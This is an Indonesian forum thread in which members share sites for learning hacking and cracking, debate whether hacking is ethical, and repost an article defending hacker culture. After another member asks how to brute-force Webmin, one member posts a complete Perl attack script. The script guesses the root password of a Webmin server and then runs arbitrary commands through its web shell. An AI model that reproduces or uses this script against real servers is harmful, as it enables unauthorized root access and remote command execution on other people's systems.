Site Hacking & Cracking

Di topik ini saya mau nanya (kebanyakan nanya ya...???) tentang site2 yang bisa di jadikan acuan jika kita ingin mempelajari tentang hacking & cracking.

Silahkan share site2 yang kalian ketahui untuk belajar tentang hacking & cracking.

www.jasakom.com
www.echo.or.id
www.securityfocus.com
www.milw0rm.com

Masih banyak sih, cuma kelupaan.

Ntar klo inget di posting lagi ya.

Bagi yang lain silahkan share disini ya....

waduh abg nie hacker ya??..
mau donk di ajarin ilmu nya....hehehehe
boleh ya bg...
saya juga ikut nambah 1 site nya ya?
http://www.lirva32.org
http://www.kecoak-elektronik.net
yg local local aja dulu ya?hehehe

Kerjaannya ngehack aja..
nie aq tambahin, tapi ntuk belajar ya.. jangan disalah gunakan..
www.hackthissite.org
yogyafree.com
nostalgia.com

Note :
Cobalah berfikir jika karya kita di bajak oleh orang lain...
Maka hargailah karya seseorang maka orang akan menghargai karya kita..
Hacking boleh2 aja tapi selama digunakan untuk pembelajaran..

wadoh mbak shelly nie hacker juga kek nya nie..
bagi2 donk ilmunya...
oh ya mbak aku mu tyk nie gmn ya caranya mem bruteforce webmin...
makasih...

coba ini mas :

#!/usr/bin/perl
##
# Webmin BruteForce + Command execution - By Di42lo <DiAblo_2@012.net.il>
#
# usage
# ./bruteforce.webmin.pl <host> <command>
#
#./bruteforce.webmin.pl 192.168.0.5 "uptime"
# [+] BruteForcing...
# [+] trying to enter with: admim
# [+] trying to enter with: admin
# [+] Found SID : f3231ff32849fa0c8c98487ba8c09dbb
# [+] Password : admin
# [+] Connecting to host once again
# [+] Connected.. Sending Buffer
# [+] Buffer sent...running command uptime
# root logged into Webmin 1.170 on linux (SuSE Linux 9.1)
# 10:55pm up 23 days 9:03, 1 user, load average: 0.20, 0.05, 0.01

use IO::Socket;
if (@ARGV<2){ print "Webmin BruteForcer\nusage:\n$0 <host> <command>\n"; exit; }
my $host=$ARGV[0];
my $cmd=$ARGV[1];
#start pass:
my $pass="a";
my $chk=0;
my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000")
|| die "[-] Webmin on this host does not exist\r\n";
$sock->close;
print "[+] BruteForcing...\n";
my $sid;
while ($chk!=1) {
$pass++;
my $pass_line="page=%2F&user=root&pass=$pass";
my $buffer="POST /session_login.cgi HTTP/1.0\n".
"Host: $host:10000\n".
"Keep-Alive: 300\n".
"Connection: keep-alive\n".
"Referer: http://$host:10000/\n".
"Cookie: testing=1\n".
"Content-Type: application/x-www-form-urlencoded\n".
"Content-Length: __\n".
"\n".
$pass_line."\n\n";
my $line_size=length($pass_line);
$buffer=~s/__/$line_size/g;
my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000");
if ($sock)
{
print "[+] trying to enter with: $pass\n";
print $sock $buffer;
while ($answer=<$sock>)
{
if ($answer=~/sid=(.*);/g)
{
$chk=1;
$sid=$1;
print "[+] Found SID : $sid\n";
print "[+] Password : $pass\n";
}
}
}
$sock->close;
}
print "[+] Connecting to host once again\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000") ||
die "[-] Cant Connect once again for command execution\n";
print "[+] Connected.. Sending Buffer\n";
my $temp="-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"cmd\"\n".
"\n".
"$cmd\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"pwd\"\n".
"\n".
"/root\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"history\"\n".
"\n".
"\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"previous\"\n".
"\n".
"$cmd\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"pcmd\"\n".
"\n".
"$cmd\n".
"-----------------------------19777347561180971495777867604--\n\n";
my $buffer_size=length($temp);
$buffer="POST /shell/index.cgi HTTP/1.1\n".
"Host: $host:10000\n".
"Keep-Alive: 300\n".
"Connection: keep-alive\n".
"Referer: http://$host:10000/shell/\n".
"Cookie: sid=$sid\; testing=1; x\n".
"Content-Type: multipart/form-data; boundary=---------------------------19777347561180971495777867604\n".
"Content-Length: siz\n".
"\n".
$temp;
$buffer=~s/siz/$buffer_size/g;
print $sock $buffer;

if ($sock)
{
print "[+] Buffer sent...running command $cmd\n";
print $sock $buffer;

while ($answer=<$sock>)
{
#print $answer;
if ($answer=~/defaultStatus="(.*)";/g) { print $1."\n";}
if ($answer=~/<td><pre><b>&gt;/g)
{
$cmd_chk=1;
}
if ($cmd_chk==1)
{
if ($answer=~/<\/pre><\/td><\/tr>/g)
{
exit;
} else { print $answer; }
}
}
}

# milw0rm.com [2004-12-22]

Mbak shely, nge hack itu bukan nge bajak.

Ko nge bajak sih itu cracking.

Klo ngebajak sih itu karena mereka berpedoman pada hacker manifesto (tau kan???), bahwa segala macam bentuk informasi haruslah gratis.

Jadi klo ada sesuatu yg ngak free, mereka akan melakukan segala macam cara untuk membuatnya free, salah satunya ya dgn cara cracking.

Hacking itu gak selamanya jelek loh.

Kita berusaha menemukan sebuah kelemahan pada suatu sistem, lalu bersama-sama memperbaikinya.

Klo urusan ngerusak sih itu balik lg pada pribadi masing2.

Bukankah teknologi itu seperti pedang bermata 2, bisa untuk kebaikan dan bisa untuk kejahatan.

Tergantung siapa yang menggunakannya....

Ok2... silahkan, lanjut aja deh...
hack and crack aja terus sampe puas, ntar pasti nyadar deh.. beneran...!!
buat vaako, saya rasa hack n crack itu termasuk membajak, bajak itu mempunyai artian yang luas, maksudnya dimana pada hack n crack kita melakukan suatu hal yang merugikan pihak lain.. dimana kita melakukan hal tanpa access/ijin.. dan melanggar lisensi si pencipta..

Setuju sama pak berto..
yang penting jangan disalah gunakan aza dehh..

waduh mbak shelly dan pak berto sekarang tergantung pada sikonnya itu aja kok sebenarnya...
yg namanya org pinter itu pasti gk mau merasa terbatas dengan yg namanya enkripsi...
karena setiap pertanyaan itu pasti ada jawabannya...
hehehe...

Waduh pro and kontra nih...
aq netral aja ya...
sebenarnya ini hanya perbedaan sudut pandang aja..

yaudahlah aku ngalah aja karena aku juga masih baru2 dengar dengan yg namanya cracking dan hacking..
mgk karena blm cukup ilmu kali ya..

Coba deh baca artikel ni:

Tindakan apa yang akan anda ambil tatkala menyadari putera/putri anda sering terlihat beraksi bersama beberapa kelompok Hacker di Internet?? Mencegah?? Mendukung??

Banyak orang memiliki persepsi salah dalam memandang dunia Hacking. Walaupun sudah begitu banyak para white hat menggembar-gemborkan disana-sini bahwa Hacking is NOT Cracking, Hacking adalah pekerjaan mulia, Hacking isn't CRIME! dan lain-lain... dan lain-lain... dan lain-lain... dan lain-lain... namun tetap saja masyarakat kita beranggapan bahwa Hacking adalah aktivitas NEGATIF. Orang tua akan lebih senang jika anaknya bercita-cita menjadi dokter, perawat atau pilot daripada mendengar putera/putrinya mengatakan "Saya ingin menjadi seorang HACKER!".

Tidak bisa dipungkiri, para white hat sendiri pun kadangkala terkesan terlalu melebih-lebihkan dunia mereka dekat pada kesempurnaan. Anak-anak akan lebih memandang bahwa Hacker pastilah kaya-raya, Hacker pastilah hidup serba kecukupan, Hacker pastilah.. ah, dan masih banyak lagi dugaan-dugaan menakjubkan di pikiran mereka. Padahal di kenyataannya, Hacking bukan kegiatan yang mengharapkan untuk mendapat sesuatu, namun berharap akan ada sesuatu yang mereka berikan dan bermanfaat bagi orang lain.

Lalu siapa yang salah?? Tidak ada yang salah. Orang tua mana sich yang ingin anaknya menjadi kriminal? Ya, kriminal, karena beberapa tindakan Hacking memang tergolong ILEGAL jika dilakukan pada tempat dan waktu yang salah.

Hacking bukan hanya sekedar melakukan serangan-serangan dengan tumpukan-tumpukan exploit, tidak sekedar menghabiskan waktu untuk mendebug program, tidak sekedar mencari security hole. Setiap pengabdi pada budaya Hacker dan melakukan kegiatan demi budaya itu, maka itulah Hacking. Memoderasi milis-milis ilmu pengetahuan, forum-forum besar, menyebarluaskan informasi.. semua itu masuk dalah kegiatan HACKING.

Dulu ketika saya masih di bangku sekolah, saya sering mendapat teguran dari orang tua saya.. "Buat apa sih kamu nulis artikel, memangnya dengan menulis artikel kamu akan mendapat uang?? Toh artikel itu nantinya akan kamu sebar luaskan secara cuma-cuma! buang-buang waktu saja.."

Hehehe.. mungkin kata-kata diatas pernah anda ucapkan pada kerabat atau putera-putri anda yang rajin mempersiapkan artikel untuk zine situs-situs Hacker. Buang-buang waktu?? Buang-buang uang?? Saya rasa tidak sepenuhnya BENAR. Sekarang bandingkan dengan belajar BIOLOGI (kita balik lagi ke SMA yach..). Buat apa sich rajin-rajin belajar biologi?? buat apa sich ngerjakan-soal-soal sulit di rumah?? emangnya nanti soal-soal yang kamu kerjakan di rumah itu akan dinilai oleh guru?? emangnya semua itu akan masuk rapor di akhir semester?? nggak khan?? Emang enggak, tapi khan kita jadi gape BIOLOGI! Nah, hal yang sama terjadi pada belajar Hacking dan mengabdi pada budaya Hacking.

Kita mungkin tidak mendapat uang.. kita mungkin akan kehilangan waktu bermain.. kita mungkin akan kehilangan waktu untuk bersosialisasi.. namun kita mendapatkan PENGALAMAN dan KEMAMPUAN yang tidak akan pernah didapatkan orang lain. Bukankah semua itu layak untuk diperjuangkan?

Ada suatu "mitos" yang mengatakan bahwa jika kita bergabung di suatu channel Hacker dan kita bukan salah seorang yang telah dikenal dikalangan mereka, maka kita akan diabaikan. Nah, bagaimana kita bisa dikenal jika kita belum pernah berkarya dan mengabdi pada budaya yang sama dengan budaya mereka??

Jika masalah uang memang faktornya, tidak terlalu sulit bagi seorang Hacker untuk mencari uang. Di jaman yang seperti sekarang ini, mencari pekerjaan tidak cukup dengan sederetan sertifikat dan gelar SARJANA. Kenyataan bahwa relasi dan kemampuan "nyata" ternyata mampu mengalahkan semua itu. Jika anda melamar suatu pekerjaan di sebuah perusahaan yang sedang membutuhkan Administrator Jaringan misalnya. Anda akan lebih mudah dietrima jika sebelumnya anda telah dikenal secara baik dari segi kemampuan daripada mereka yang hanya mengandalkan sertifikat dan ijazah. Surat lamaran anda akan segera menggeser tumpukan surat pelamar lain kedalam tong sampah

Well.. mengapa harus takut saat putera/putri kita terlibat aktivitas "HACKING"?? Yang seharusnya kita lakukan adalah membimbing mereka dan memberikan dukungan sambil mengarahkan agar nantinya mereka bisa menjadi seorang Hacker yang beretika dan berguna bagi masyarakat. Yang bisa kita lakukan adalah membantu mereka, entah itu dalam hal membagi waktu dan lain sebagainya.

So.. HACKING.. WHY NOT??!!!


Aku kutip dari :

Author : LUNA_HACK
Contact : 1un4_h4ck@hackermail.com
CopyLEFT (c) 2007 www.spyrozone.tk All Rights Reserved
» 31/01/2007 03:55:10 WIB